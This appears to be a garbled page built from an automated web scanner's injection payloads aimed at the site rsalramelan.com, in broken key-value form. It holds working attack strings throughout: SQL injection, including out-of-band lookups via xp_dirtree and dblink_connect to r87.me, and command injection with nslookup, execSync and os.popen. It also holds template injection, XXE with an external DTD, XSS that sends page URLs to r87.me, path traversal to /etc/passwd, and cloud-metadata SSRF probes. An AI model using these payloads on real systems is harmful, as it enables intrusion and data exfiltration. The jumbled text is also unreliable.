  • '+print localtime()*0+0xFFF9999-5853+':
  • rsalramelan.com/elmah.axd: 3
  • :
  • 3: 3
  • 3: 3
  • 3: 3
  • 3: '& ping -n 25 127.0.0.1 &
  • syscolumns WHERE 2>3;exec('xp_dirtree ''\\acmpznnyxl6dcqnh49tfgyw5kre9bzwjuntvfvva'+'xjg.r87.me'+'\c$\a''')--:
  • 3:
  • : <?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/read=convert.base64-encode/resource=http://acmpznny"><!ENTITY % d "xlik0ywxssnkniqppvu75icixysbfyy-e04.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>
  • //r87?com/?:
  • '"@--></style></scRipt><scRipt>netsparker(0x0474CF)</scRipt>:
  • '+((SELECT 1 FROM (SELECT SLEEP(25))A))+':
  • : php://filter//resource=http://acmpznnyxlxkyzoarzdedzoqneng_rjbb8k_tpp5_r9.r87.me/p/
  • 044.6001503/trace.axd:
  • createobject("WScript.Shell").exec("nslookup acmpznnyxl20kbzphlw1pdedlkqhgck8vyhu7zdr" & "amk.r87.me").StdOut.ReadAll:
  • :
  • /../../../../../../../../../../etc/httpd/logs/error.log: 3
  • '+print localtime()*0+0xFFF9999-16687+': 3
  • 3: 3
  • 36.91.147.95/elmah.axd:
  • :
  • 3: 3
  • :
  • : & ping -n 25 127.0.0.1 &
  • syscolumns WHERE 2>3;exec('xp_dirtree ''\\acmpznnyxlchvwzhfyycq_hoi__degai9yqpo64d'+'43c.r87.me'+'\c$\a''')--: 3
  • 3: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/read=convert.base64-encode/resource=http://acmpznny"><!ENTITY % d "xl-8efoml_x5ketxptdlx1cofkjjflgv_-8.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>
  • :
  • //r87?com/?: 3
  • '+((SELECT 1 FROM (SELECT SLEEP(25))A))+': 3
  • 3: php://filter//resource=http://acmpznnyxlq9a851nifwbddj1qrcpzoqfc-vutjpsan.r87.me/p/
  • '"@--></style></scRipt><scRipt>netsparker(0x0474D0)</scRipt>: 3
  • 044.91.147.95/trace.axd:
  • createobject("WScript.Shell").exec("nslookup acmpznnyxla-a3iwrjrzjgwm4hkos79bx29n-i0c" & "5lw.r87.me").StdOut.ReadAll: 3
  • 3: 3
  • "+print localtime()*0+0xFFF9999-31593+":
  • /../../../../../../../../../../etc/httpd/logs/error_log:
  • :
  • 36.91.147.95/elmah.axd: 3
  • 3: 3
  • 3: 3
  • 3: 3
  • 3: & ping -n 25 127.0.0.1 &
  • 3:
  • @r87.com:
  • : acmpznnyxlmur3nvrkojtlxwx58adqliqctcyjoovup.r87.me/p/
  • -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+':
  • 044.91.37727/trace.axd:
  • %22%2bnetsparker(0x0475A0)%2b%22:
  • +createobject("WScript.Shell").exec("nslookup acmpznnyxlirkbmxp53wag5uhpnxre2kypgeuwab" & "51g.r87.me").StdOut.ReadAll:
  • :
  • "+print localtime()*0+0xFFF9999-85195+": 3
  • /../../../../../../../../../../etc/httpd/logs/error_log: 3
  • 3: 3
  • 3: 3
  • : {{268409241-78003}}
  • 127.100.11.2/elmah.axd:
  • : ping -n 25 127.0.0.1 &
  • @r87.com: 3
  • 3: acmpznnyxloxgzkj7-tw4f0jtfoale-bdrrox-8us8z.r87.me/p/
  • -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+': 3
  • 04426711537/trace.axd:
  • +createobject("WScript.Shell").exec("nslookup acmpznnyxl5kykfmm7jidkdnzgkqp3nnnurjd72w" & "p5m.r87.me").StdOut.ReadAll: 3
  • %22%2bnetsparker(0x0475A1)%2b%22: 3
  • 3: 3
  • arguments[1].end(require('child_process').execSync('expr 268409241 - 97774')):
  • /../../../../../../../../../../var/log/apache2/error.log:
  • 3: 3
  • : "& SET /A 0xFFF9999-74610 &
  • 3: {{268409241-85991}}
  • 3: ping -n 25 127.0.0.1 &
  • 127.100.11.2/elmah.axd: 3
  • :
  • 0x24.6001503/trace.axd:
  • -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)):
  • +createobject("WScript.Shell").exec("nslookup acmpznnyxlomjdqcvz3-1bnf9dyuqpjwvl3s2p11" & "zam.r87.me").StdOut.ReadAll+:
  • <html xmlns="http://www.w3.org/1999/xhtml"><script>netsparker(0x0475B6)</script></html>:
  • arguments[1].end(require('child_process').execSync('expr 268409241 - 73654')): 3
  • :
  • 3: 3
  • /../../../../../../../../../../var/log/apache2/error.log: 3
  • :
  • 3: "& SET /A 0xFFF9999-79724 &
  • : ${268409241-19302}
  • : "&ping -w 25 127.0.0.1 &"
  • 3: 3
  • 0x24.91.147.95/trace.axd:
  • ::1/elmah.axd:
  • -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)): 3
  • +createobject("WScript.Shell").exec("nslookup acmpznnyxlz5w12fgx6xoeitx4ksswryfutnkzfg" & "kbk.r87.me").StdOut.ReadAll+: 3
  • <html xmlns="http://www.w3.org/1999/xhtml"><script>netsparker(0x0475B7)</script></html>: 3
  • arguments[1].end(require('child_process').execSync('set /A 268409241 - 71559')):
  • 3: 3
  • 3: 3
  • 3: 3
  • /../../../../../../../../../../var/log/apache/error.log:
  • : '& SET /A 0xFFF9999-47695 &
  • 3: ${268409241-29632}
  • 3: "&ping -w 25 127.0.0.1 &"
  • :
  • 0x24.91.37727/trace.axd:
  • -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+":
  • ::1/elmah.axd: 3
  • <%createobject("WScript.Shell").exec("nslookup acmpznnyxlwm-bzxeyejj69saez84dgi-twscow_" & "wbk.r87.me").StdOut.ReadAll%>:
  • //r87.com/?0x0475CB:
  • 3: 3
  • arguments[1].end(require('child_process').execSync('set /A 268409241 - 42006')): 3
  • 3: '& SET /A 0xFFF9999-35545 &
  • /../../../../../../../../../../var/log/apache/error.log: 3
  • : '&ping -w 25 127.0.0.1 &'
  • 3: 3
  • : =268409241-99861
  • 0x245b935f/trace.axd:
  • -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+": 3
  • <%createobject("WScript.Shell").exec("nslookup acmpznnyxld5i6oeguob48nznjk_vx-vu6r37lc0" & "l0e.r87.me").StdOut.ReadAll%>: 3
  • 127.0.0.1/elmah.axd:
  • //r87.com/?0x0475CC: 3
  • 3: 3
  • %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-94361)}:
  • SELECT dblink_connect('host=acmpznnyxlro6cio5egmoxk24zexysf1vqk8vcnm'||'h3s.r87.me user=a password=a connect_timeout=2'):
  • : & SET /A 0xFFF9999-54549 &
  • 3: '&ping -w 25 127.0.0.1 &'
  • /../../../../../../../../../../proc/version:
  • :
  • 1603492644/trace.axd:
  • 3: =268409241-36423
  • ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1:
  • "+createobject("WScript.Shell").exec("nslookup acmpznnyxlol-ldewbxuxjbkpmqfc7chc1anlhdl" & "gde.r87.me").StdOut.ReadAll+":
  • <a HrEf=JaVaScRiPt:netsparker(0x0475FF)>:
  • 3: 3
  • 127.0.0.1/elmah.axd: 3
  • %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-45516)}: 3
  • SELECT dblink_connect('host=acmpznnyxl_i0lrlgc6jb_py_dicwqxgu_y9qxgd'||'cgq.r87.me user=a password=a connect_timeout=2'): 3
  • 3: & SET /A 0xFFF9999-31039 &
  • : &ping -w 25 127.0.0.1 &
  • 3: 3
  • /../../../../../../../../../../proc/version: 3
  • 36.6001503/trace.axd:
  • : {{=268409241-89079}}
  • ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1: 3
  • "+createobject("WScript.Shell").exec("nslookup acmpznnyxlxb2xttc9ume5xch51sg1sy-omler7f" & "dym.r87.me").StdOut.ReadAll+": 3
  • <a HrEf=JaVaScRiPt:netsparker(0x047600)>: 3
  • 3: 3
  • [::1]/elmah.axd:
  • p "#{0xFFF9999.to_i-`echo 25971`.to_i}":
  • dblink_connect('host=acmpznnyxllnjrne-janrsg_9fbqmfapm_y_e2ls'||'hoa.r87.me user=a password=a connect_timeout=2'):
  • : SET /A 0xFFF9999-93029 &
  • :
  • 3: &ping -w 25 127.0.0.1 &
  • 36.91.147.95/trace.axd:
  • /../../../../../../../../../../proc/version.php:
  • :
  • 3: {{=268409241-79736}}
  • gethostbyname(lc 'acmpznnyxlolpi7raqulkct_4u3camltpwgf71kd'.'uzk.r87.me'):
  • 3: 3
  • ns@mail.ns'"/>()%26%25<ScRiPt >netsparker(0x047624)</ScRiPt>:
  • [::1]/elmah.axd: 3
  • p "#{0xFFF9999.to_i-`echo 46444`.to_i}": 3
  • dblink_connect('host=acmpznnyxl8fiblvlmccdh4ggbu0j23dc-mxpjiy'||'l-u.r87.me user=a password=a connect_timeout=2'): 3
  • 3: SET /A 0xFFF9999-85677 &
  • 3: 3
  • 36.91.37727/trace.axd:
  • : ping -w 25 127.0.0.1 &
  • /../../../../../../../../../../proc/version.php: 3
  • 3: 3
  • gethostbyname(lc 'acmpznnyxloluqvws9rgnxe_0byhpkgfb4jmttl0'.'wee.r87.me'): 3
  • 3: -1 OR 1=1
  • : <%- 268409241-14208 %>
  • ns@mail.ns'"/>()%26%25<ScRiPt >netsparker(0x047625)</ScRiPt>: 3
  • https://rsalramelan.com/elmah:
  • __import__('os').popen(('expr 268409241 - {0}').format('48314')).read():
  • : SET /A 0xFFF9999-51867
  • :
  • 000177.000.00000.000001/trace.axd: 3
  • 3: ping -w 25 127.0.0.1 &
  • /../../../../../../../../../../../etc/passwd:
  • :
  • eval('gethostbyname(lc 'acmpznnyxlsbriri0iu2wlnnxr6ke_wzxg1zeh0s'.'bqo.r87.me')'):
  • 3: -1 OR 1=1
  • 3: <%- 268409241-61202 %>
  • :
  • &apos;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;iMg src=N onerror=netsparker(0x04764F)&gt;:
  • https://rsalramelan.com/elmah: 3
  • __import__('os').popen(('expr 268409241 - {0}').format('35668')).read(): 3
  • 3: SET /A 0xFFF9999-66195
  • : '"--></style></scRipt><scRipt src="//acmpznnyxloctr_4bb2gy5hdu0i2vejtgjd-75uo7ay&#46;r87&#46;me"></scRipt>
  • 3: 3
  • 0177.0.0.1/trace.axd: 3
  • : ping -n 25 127.0.0.1
  • /../../../../../../../../../../../etc/passwd: 3
  • 3: 3
  • eval('gethostbyname(lc 'acmpznnyxlku0rwcudqfn-eqmdutujajkmrqgv5o'.'d1e.r87.me')'): 3
  • 3: -1 OR 1=1
  • : #set($c=268409241 - 81996) ${c}
  • 3: 3
  • &apos;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;iMg src=N onerror=netsparker(0x047650)&gt;: 3
  • rsalramelan.com/elmah:
  • __import__('os').popen(('SET /A 268409241 - {0}').format('12742')).read():
  • : | SET /A 0xFFF9999-5010
  • 3: '"--></style></scRipt><scRipt src="//acmpznnyxloixz4dgdlxhwitl3k6wrienckavlqr7pi&#46;r87&#46;me"></scRipt>
  • :
  • 0177.0.1/trace.axd: 3
  • 3: ping -n 25 127.0.0.1
  • file:///etc/passwd:
  • '+gethostbyname(lc 'acmpznnyxl7903uhlnv1ck8c5k_r7dxkibxwj0mj'.'e0a.r87.me')+':
  • :
  • 3: -1 OR 1=1
  • 3: #set($c=268409241 - 51356) ${c}
  • &apos;&quot;&gt;&lt;iMg src=N onerror=netsparker(0x047671)&gt;:
  • __import__('os').popen(('SET /A 268409241 - {0}').format('58432')).read(): 3
  • rsalramelan.com/elmah: 3
  • 3: | SET /A 0xFFF9999-30606
  • : <iMg src=N onerror="this.onerror='';this.src='//acmpznnyxlnasrpsjef8yo3lg5ckb0ge4xkmvakh'+'lj0.r87.me/r/?'+location.href">
  • 3: 3
  • 0177.1/trace.axd: 3
  • : ping -w 25 127.0.0.1
  • '+gethostbyname(lc 'acmpznnyxl8risiz411juhghhjyx3b_orgrtg4lq'.'2im.r87.me')+': 3
  • 3: 3
  • file:///etc/passwd: 3
  • 3: '
  • : <#assign x=268409241 - 50102> ${x?string["0"]}
  • '||(SELECT dblink_connect('host=acmpznnyxlde5qlcydrvajee_ysza2aoag_97ghp'||'jqe.r87.me user=a password=a connect_timeout=2'))||':
  • &apos;&quot;&gt;&lt;iMg src=N onerror=netsparker(0x047672)&gt;: 3
  • :
  • 36.91.147.95/elmah:
  • : 1";expr 268409241 - 5798;"
  • :
  • 3: <iMg src=N onerror="this.onerror='';this.src='//acmpznnyxlysnf1yqe9diibgkkm5tnanv3ubqzhm'+'hr8.r87.me/r/?'+location.href">
  • 017700000001/trace.axd: 3
  • 3: ping -w 25 127.0.0.1
  • "+gethostbyname(lc 'acmpznnyxlurmt6lrhvue9tbvgmxpzphp_0rvm9-'.'3qa.r87.me')+":
  • :
  • 3: NS-1NO
  • /../../../../../../../../../../../etc/passwd:
  • '||(SELECT dblink_connect('host=acmpznnyxlzknuss4jizohycmofrgcmcorbklvs4'||'zjq.r87.me user=a password=a connect_timeout=2'))||': 3
  • 3: <#assign x=268409241 - 17725> ${x?string["0"]}
  • 3: 3
  • &lt;iMg src=N onerror=ns(0x04768D)&gt;:
  • 36.91.147.95/elmah: 3
  • 3: 1";expr 268409241 - 66285;"
  • 3: 3
  • 0x7f.0.0.1/trace.axd: 3
  • : <iMg src="//r87.me/images/1.jpg" onload="this.onload='';this.src='//acmpznnyxlpwxpgdpqykutiruzyljwno4bjxatjk'+'ivy.r87.me/r/?'+location.href">
  • "+gethostbyname(lc 'acmpznnyxlbqgbdnrrirbqrhoznijwsojiyt2hjl'.'mjy.r87.me')+": 3
  • : |ping -n 25 127.0.0.1
  • 3: -1 AND 'NS='ss
  • 3: 3
  • /../../../../../../../../../../../etc/passwd: 3
  • (select UTL_INADDR.GET_HOST_ADDRESS('acmpznnyxlhqludlqg7zo_urii2aacgnio0nvrer'||'t9e.r87.me') from DUAL):
  • : <%= "#{268409241-20728}" %>
  • :
  • &lt;iMg src=N onerror=ns(0x04768E)&gt;: 3
  • : 1';expr 268409241 - 7012;'
  • :
  • 0x7f.0.1/trace.axd: 3
  • 127.100.11.2/elmah:
  • 3: <iMg src="//r87.me/images/1.jpg" onload="this.onload='';this.src='//acmpznnyxlkjbtfsab81wlxnc03dkqx2ydjogivz'+'yeq.r87.me/r/?'+location.href">
  • 3: |ping -n 25 127.0.0.1
  • 3: -1' OR 1=1 OR 'ns'='ns
  • :
  • :
  • /../../../../../../../../../../../etc/passwd.php:
  • (select UTL_INADDR.GET_HOST_ADDRESS('acmpznnyxl5ukfktiolhel4i8lg5-xyibzjnvfnb'||'mna.r87.me') from DUAL): 3
  • 3: 3
  • 3: <%= "#{268409241-92939}" %>
  • &apos;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;iMg src=N onerror=netsparker`0x0476AA`&gt;:
  • 3: 1';expr 268409241 - 58130;'
  • 3: 3
  • 0x7f.1/trace.axd: 3
  • : <fRame src=N onload="this.onload='';this.src='//acmpznnyxlnkm0_vmrq7wntl9en_3j46cmi1mtfy'+'ac8.r87.me/r/?'+location.href">
  • 127.100.11.2/elmah: 3
  • 3: -1" OR 1=1 OR "ns"="ns
  • 3: 3
  • 3: 3
  • /../../../../../../../../../../../etc/passwd.php: 3
  • :
  • &apos;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;iMg src=N onerror=netsparker`0x0476AB`&gt;: 3
  • : 1;expr 268409241 - 95460;x
  • :
  • 0x7f000001/trace.axd: 3
  • 3: <fRame src=N onload="this.onload='';this.src='//acmpznnyxlruk4useewrd4u3bu7emvxhgf7l50of'+'kdi.r87.me/r/?'+location.href">
  • 3: -1 OR 17-7=10
  • ::1/elmah:
  • :
  • :
  • ...//...//...//...//...//...//...//...//...//...//...//etc/passwd:
  • &apos;&quot;&gt;&lt;iMg src=N onerror=netsparker`0x0476E6`&gt;:
  • 3: 3
  • 3: 1;expr 268409241 - 82590;x
  • 3: 3
  • 127.0.0.1/trace.axd: 3
  • 3: -1 OR X='ss
  • : <scRipt src="data:;base64,bD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJsaW5rIik7bC5yZWw9InByZWZldGNoIjtsLmhyZWY9Ii8vYWNtcHpubnl4bGcyemNsdm9lY2lkaWlhemd5cng4ZnNia2x6LWtmYiIrIm10OC5yODcubWUvci8/Iitsb2NhdGlvbi5ocmVmO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQobCk="></scRipt>
  • ::1/elmah: 3
  • 3: 3
  • 3: 3
  • ...//...//...//...//...//...//...//...//...//...//...//etc/passwd: 3
  • &apos;&quot;&gt;&lt;iMg src=N onerror=netsparker`0x0476E8`&gt;: 3
  • :
  • :
  • : expr 268409241 - 85658;
  • 127.0.1/trace.axd: 3
  • 3: -1' OR 1=1 OR '1'='1
  • 3: <scRipt src="data:;base64,bD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJsaW5rIik7bC5yZWw9InByZWZldGNoIjtsLmhyZWY9Ii8vYWNtcHpubnl4bHZlcTV4aGh6b291YnZsdGxjemtna25hbWd5Zm1laSIrImxray5yODcubWUvci8/Iitsb2NhdGlvbi5ocmVmO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQobCk="></scRipt>
  • :
  • 127.0.0.1/elmah:
  • :
  • 3: 3
  • 3: 3
  • ....//....//....//....//....//....//....//....//....//....//....//etc/passwd:
  • &lt;iMg src=N onerror=ns`0x04775E`&gt;:
  • 127.1/trace.axd: 3
  • 3: expr 268409241 - 85928;
  • 3: -1' OR 1=1 OR '1'='1
  • : ";l=document.createElement("link");l.rel="prefetch";l.href="//acmpznnyxltwyaspq76eup2inmuhmtgxz3otqhpc"+"86e.r87.me/r/?"+location.href;document.head.appendChild(l);//
  • 3: 3
  • :
  • 3: 3
  • :
  • 127.0.0.1/elmah: 3
  • 16777343/trace.axd: 3
  • &lt;iMg src=N onerror=ns`0x04775F`&gt;: 3
  • ....//....//....//....//....//....//....//....//....//....//....//etc/passwd: 3
  • 3: -1" OR 1=1 OR "1"="1
  • : expr 268409241 - 94964
  • 3: ";l=document.createElement("link");l.rel="prefetch";l.href="//acmpznnyxlkcxazdplyqfrb7zb713rxuiplabyrt"+"cia.r87.me/r/?"+location.href;document.head.appendChild(l);//
  • :
  • 3: 3
  • 3: 3
  • 00044.00133.0000223.00000137/trace.axd: 3
  • Content-Type:text/html <scRipt>ns(0x04787F)</scRipt>:
  • [::1]/elmah:
  • 3: -1" OR 1=1 OR "1"="1
  • .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd:
  • 3: expr 268409241 - 58053
  • : ';l=document.createElement("link");l.rel="prefetch";l.href="//acmpznnyxlsi40zvj1jrhuyvzw0tpuhcmqodenbk"+"xku.r87.me/r/?"+location.href;document.head.appendChild(l);//
  • 3: 3
  • :
  • 044.6001503/trace.axd: 3
  • :
  • 3: -1 OR 1=1
  • Content-Type:text/html <scRipt>ns(0x047880)</scRipt>: 3
  • [::1]/elmah: 3
  • : <!--#exec cmd="expr 268409241 - 26337"-->
  • .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd: 3
  • nslookup "acmpznnyxl0_kmqtucn8dpt2bfbueixsqp1sg62y""ztm.r87.me":
  • 3: ';l=document.createElement("link");l.rel="prefetch";l.href="//acmpznnyxldf_z-crtvr2hko5cioamnmpkqrjjyt"+"p0e.r87.me/r/?"+location.href;document.head.appendChild(l);//
  • :
  • 3: 3
  • 044.91.147.95/trace.axd: 3
  • 3: -1 OR 1=1
  • 3: 3
  • <frame src="javascript:netsparker(0x04789B)"></frame>:
  • 3: <!--#exec cmd="expr 268409241 - 40719"-->
  • http://aws.r87.me/latest/meta-data/public-hostname:
  • nslookup "acmpznnyxlb7jlvv9zic95n99uolzbzajordmkay""8pm.r87.me": 3
  • . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd:
  • :
  • 044.91.37727/trace.axd: 3
  • 3: 3
  • 3: -1 OR 1=1
  • :
  • <frame src="javascript:netsparker(0x04789C)"></frame>: 3
  • : |expr${IFS}268409241${IFS}-${IFS}60687
  • :
  • :
  • :
  • http://aws.r87.me/latest/meta-data/public-hostname: 3
  • &nslookup "acmpznnyxllbd5x5jm7-wcvxywy6h3re8ahtp7g1""s6y.r87.me":
  • . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd: 3
  • 3: 3
  • 04426711537/trace.axd: 3
  • 3: -1 OR 1=1
  • :
  • 3: 3
  • :
  • 3: |expr${IFS}268409241${IFS}-${IFS}9701
  • http://169.254.169.254/latest/meta-data/public-hostname:
  • &nslookup "acmpznnyxlgqwgyxm3aa8u_fjg6pbcgxr3nxcdy_""omu.r87.me": 3
  • 1/../../../../../../../../../../../etc/passwd:
  • :
  • 0x24.6001503/trace.axd: 3
  • 3: '
  • :
  • 3: 3
  • :
  • '&nslookup "acmpznnyxlfufs1xxmf7-9abmkh2-t-pa7ksrddf""qxe.r87.me":
  • 3: 3
  • http://169.254.169.254/latest/meta-data/public-hostname: 3
  • 3: 3
  • 0x24.91.147.95/trace.axd: 3
  • 3: NS-1NO
  • 3: 3
  • 1/../../../../../../../../../../../etc/passwd: 3
  • 3: 3
  • '&nslookup "acmpznnyxlspjx0l22sfrjqdpekeyn8qh2cdphrt""bi4.r87.me": 3
  • :
  • 0x24.91.37727/trace.axd: 3
  • 3: -1 AND 'NS='ss
  • :
  • http://127.0.0.1:22:
  • /etc/passwd:
  • :
  • 3: 3
  • 0x245b935f/trace.axd: 3
  • "&nslookup "acmpznnyxljzrnokilpahcj7vzkrc_wl5kvzlzgp""7v0.r87.me":
  • 3: -1' OR 1=1 OR 'ns'='ns
  • 3: 3
  • http://127.0.0.1:22: 3
  • 1603492644/trace.axd: 3
  • : http://r87.com/?rsalramelan.com/
  • 3: 3
  • /etc/passwd: 3
  • 3: -1" OR 1=1 OR "ns"="ns
  • :
  • "&nslookup "acmpznnyxl5tuukpbxvxpvhyvjhfathliyat6kt_""lca.r87.me": 3
  • :
  • 36.6001503/trace.axd: 3
  • http://36.91.147.95:22:
  • 3: http://r87.com/?rsalramelan.com/
  • :
  • 3: -1 OR 17-7=10
  • 3: 3
  • %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:
  • |nslookup${IFS}"acmpznnyxlwhhrgn8-aduzurgggprvsdb_onwohw""rk4.r87.me":
  • :
  • 36.91.147.95/trace.axd: 3
  • 3: 3
  • : http://r87.com/?rsalramelan.com/
  • 3: -1 OR X='ss
  • :
  • http://36.91.147.95:22: 3
  • 3: 3
  • 36.91.37727/trace.axd: 3
  • %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd: 3
  • 3: 3
  • |nslookup${IFS}"acmpznnyxlvvalb9nxw0nsipox-otwsxwqyplncr""te0.r87.me": 3
  • :
  • 3: http://r87.com/?rsalramelan.com/
  • 3: -1' OR 1=1 OR '1'='1
  • 3: 3
  • 000177.000.00000.000001/trace.axd:
  • http://::1:22:
  • :
  • :
  • 3: 3
  • data:;base64,TlM3NzU0NTYxNDQ2NTc1:
  • :
  • : https://r87.com/?rsalramelan.com/
  • 3: -1' OR 1=1 OR '1'='1
  • :
  • 0177.0.0.1/trace.axd:
  • 3: 3
  • http://::1:22: 3
  • :
  • 3: 3
  • data:;base64,TlM3NzU0NTYxNDQ2NTc1: 3
  • 3: https://r87.com/?rsalramelan.com/
  • 3: 3
  • 3: -1" OR 1=1 OR "1"="1
  • 3: 3
  • 0177.0.1/trace.axd:
  • 3: 3
  • http://[::1]:22:
  • : //r87.com/?http://rsalramelan.com/
  • 3: -1" OR 1=1 OR "1"="1
  • :
  • :
  • 0177.1/trace.axd:
  • create:
  • :
  • 3: //r87.com/?http://rsalramelan.com/
  • http://[::1]:22: 3
  • 3: 3
  • 017700000001/trace.axd:
  • 3: 3
  • create: 3
  • : r87.com/?rsalramelan.com/
  • 3: 3
  • :
  • 0x7f.0.0.1/trace.axd:
  • http://127.0.0.1:3306:
  • 3: r87.com/?rsalramelan.com/
  • :
  • create:
  • 3: 3
  • 0x7f.0.1/trace.axd:
  • :
  • : r87.com/?http://rsalramelan.com/
  • http://127.0.0.1:3306: 3
  • :
  • 3: 3
  • 0x7f.1/trace.axd:
  • create: 3
  • 3: r87.com/?http://rsalramelan.com/
  • : %27
  • 3: 3
  • 3: 3
  • http://36.91.147.95:3306:
  • 0x7f000001/trace.axd:
  • : r87.com/?https://rsalramelan.com/
  • /admin/kontak/konten/create:
  • :
  • 3: %27
  • 127.0.0.1/trace.axd:
  • :
  • http://36.91.147.95:3306: 3
  • :
  • 3: r87.com/?https://rsalramelan.com/
  • 3: 3
  • 127.0.1/trace.axd:
  • /admin/kontak/konten/create: 3
  • : (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
  • 3: 3
  • http://::1:3306:
  • 3: 3
  • :
  • : /\r87.com/?rsalramelan.com/
  • 127.1/trace.axd:
  • 3: (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
  • /kontak/konten/create:
  • :
  • 3: 3
  • http://::1:3306: 3
  • 3: /\r87.com/?rsalramelan.com/
  • :
  • 16777343/trace.axd:
  • : '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
  • /kontak/konten/create: 3
  • : ///r87.com/?rsalramelan.com/
  • :
  • 3: 3
  • http://[::1]:3306:
  • 00044.00133.0000223.00000137/trace.axd:
  • 3: 3
  • 3: '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
  • 3: ///r87.com/?rsalramelan.com/
  • /konten/create:
  • 3: 3
  • :
  • 044.6001503/trace.axd:
  • http://[::1]:3306: 3
  • :
  • : <iframe src="http://r87.com/?"></iframe>
  • : convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
  • :
  • 3: 3
  • /konten/create: 3
  • 044.91.147.95/trace.axd:
  • 3: 3
  • 3: <iframe src="http://r87.com/?"></iframe>
  • https://rsalramelan.com/server-status:
  • 3: convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
  • 3: 3
  • :
  • 044.91.37727/trace.axd:
  • /create:
  • :
  • : rsalramelan.com.r87.com/?
  • : 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
  • https://rsalramelan.com/server-status: 3
  • :
  • :
  • 04426711537/trace.axd:
  • 3: 3
  • 3: rsalramelan.com.r87.com/?
  • /create: 3
  • 3: 3
  • 3: 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
  • 3: 3
  • 0x24.6001503/trace.axd:
  • 3: 3
  • http://169.254.169.254/opc/v1/instance:
  • :
  • : http://rsalramelan.com.r87.com/?
  • :
  • : -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
  • \create:
  • :
  • 0x24.91.147.95/trace.axd:
  • :
  • http://169.254.169.254/opc/v1/instance: 3
  • 3: 3
  • 3: http://rsalramelan.com.r87.com/?
  • 3: -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
  • 3: 3
  • 3: 3
  • 0x24.91.37727/trace.axd:
  • {php}Smarty_Resource::parseResourceName(system("nslookup acmpznnyxl-ynnt-3h1bhdps4qkkovvyecd9a8dq"."6n8.r87.me"),'b');{/php}:
  • \create: 3
  • 3: 3
  • :
  • : https://rsalramelan.com.r87.com/?
  • : -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
  • https://metadata.packet.net/metadata:
  • 0x245b935f/trace.axd:
  • {php}Smarty_Resource::parseResourceName(system("nslookup acmpznnyxlcdmwpsv6ehgqosjddw3yyysaxo1iqx"."wdm.r87.me"),'b');{/php}: 3
  • :
  • 3: 3
  • \admin\kontak\konten\create:
  • :
  • 3: https://rsalramelan.com.r87.com/?
  • 3: -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
  • 1603492644/trace.axd:
  • https://metadata.packet.net/metadata: 3
  • 3: 3
  • :
  • \admin\kontak\konten\create: 3
  • 3: 3
  • : //r87?com/?
  • 36.6001503/trace.axd:
